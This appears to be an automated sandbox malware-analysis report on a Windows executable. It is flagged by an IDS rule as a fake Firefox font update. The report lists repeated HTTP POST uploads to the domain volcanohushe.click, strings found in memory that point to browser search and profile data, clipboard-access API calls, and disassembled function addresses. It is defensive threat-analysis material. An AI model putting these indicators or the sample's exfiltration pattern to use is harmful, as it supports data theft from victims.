                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49750 -> 104.21.71.155:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4WYAIWBAUVIRYKPM89User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12848Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3V7OYQ7SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15006Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VJ30NNYZ15CBSK94User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20570Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AQ6UQNRMT0LZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1198Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9NJQ355O5H0TXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569831Host: volcanohushe.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: volcanohushe.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: volcanohushe.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: uUtgy7BbF1.exe, 00000003.00000003.1509986181.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1480945277.000000000116B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/
                Source: uUtgy7BbF1.exe, 00000003.00000003.2171694091.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569837325.00000000011C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/ND
                Source: uUtgy7BbF1.exe, 00000003.00000003.2171537898.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171711444.00000000011E3000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1523262871.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569920904.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1509986181.00000000011E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/T
                Source: uUtgy7BbF1.exe, 00000003.00000003.1562578102.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389102087.000000000115E000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569920904.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1447167751.0000000003B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/api
                Source: uUtgy7BbF1.exe, 00000003.00000003.1389246708.000000000116B000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389102087.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389289848.0000000001189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apiNA
                Source: uUtgy7BbF1.exe, 00000003.00000003.1389246708.000000000116B000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389102087.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389289848.0000000001189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apiND
                Source: uUtgy7BbF1.exe, 00000003.00000003.1562872208.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171694091.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569837325.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562578102.00000000011C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apip
                Source: uUtgy7BbF1.exe, 00000003.00000003.1510242320.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1510107757.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562872208.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171694091.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569837325.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562578102.00000000011C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apis
                Source: uUtgy7BbF1.exe, 00000003.00000003.1562773864.0000000001169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click:443/apiCLSID
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: uUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49758 version: TLS 1.2
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433500
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_038A1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,3_2_038A1000
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433500
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_006710000_2_00671000
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_0067E0940_2_0067E094
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_006961020_2_00696102
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00682AA10_2_00682AA1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_006943FF0_2_006943FF
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00688D900_2_00688D90
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00683EA00_2_00683EA0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004098CE3_2_004098CE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004230D33_2_004230D3
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004260903_2_00426090
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042217D3_2_0042217D
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0040D11B3_2_0040D11B
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042C98C3_2_0042C98C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00411BC03_2_00411BC0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043DBAC3_2_0043DBAC
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004094003_2_00409400
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004384B03_2_004384B0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041052C3_2_0041052C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043FEF03_2_0043FEF0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004407703_2_00440770
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004387D03_2_004387D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004290703_2_00429070
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004090003_2_00409000
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004280003_2_00428000
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041C0C03_2_0041C0C0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004058D03_2_004058D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004038D03_2_004038D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004237503_2_00423750
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043E8A73_2_0043E8A7
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042A9503_2_0042A950
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041C9203_2_0041C920
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004301D53_2_004301D5
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004239E03_2_004239E0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004391E13_2_004391E1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004081803_2_00408180
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004061803_2_00406180
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004401803_2_00440180
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041E9903_2_0041E990
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041A1903_2_0041A190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004191903_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041B9A03_2_0041B9A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004182413_2_00418241
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041FA743_2_0041FA74
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00430A783_2_00430A78
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004172073_2_00417207
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004332103_2_00433210
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00428A313_2_00428A31
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00415A3C3_2_00415A3C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042C2C13_2_0042C2C1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004042803_2_00404280
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004142A03_2_004142A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00417AB83_2_00417AB8
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00423B403_2_00423B40
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041D3503_2_0041D350
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00421B003_2_00421B00
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042D3063_2_0042D306
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004163C03_2_004163C0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004393D03_2_004393D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004383D03_2_004383D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004073F03_2_004073F0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042D3F13_2_0042D3F1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004253803_2_00425380
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043F3803_2_0043F380
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00422B843_2_00422B84
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041CB903_2_0041CB90
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042D3913_2_0042D391
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00422BA03_2_00422BA0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00404BB03_2_00404BB0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004404503_2_00440450
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042B46E3_2_0042B46E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00436C7D3_2_00436C7D
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004264303_2_00426430
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042B4353_2_0042B435
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00418CE13_2_00418CE1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00439C8E3_2_00439C8E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043F4903_2_0043F490
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0040CC993_2_0040CC99
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0040E49F3_2_0040E49F
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004374A33_2_004374A3
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00427D523_2_00427D52
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042856C3_2_0042856C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004155063_2_00415506
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004275273_2_00427527
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043EDCE3_2_0043EDCE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043F5E03_2_0043F5E0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00437D803_2_00437D80
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041D5B03_2_0041D5B0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004066103_2_00406610
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042E6173_2_0042E617
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00405E203_2_00405E20
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00427E223_2_00427E22
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004286303_2_00428630
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004306373_2_00430637
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004266393_2_00426639
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00402ED03_2_00402ED0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00417EEE3_2_00417EEE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043F6903_2_0043F690
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00415E9A3_2_00415E9A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00414EA03_2_00414EA0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0040F6AA3_2_0040F6AA
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0042774C3_2_0042774C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004237503_2_00423750
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004217703_2_00421770
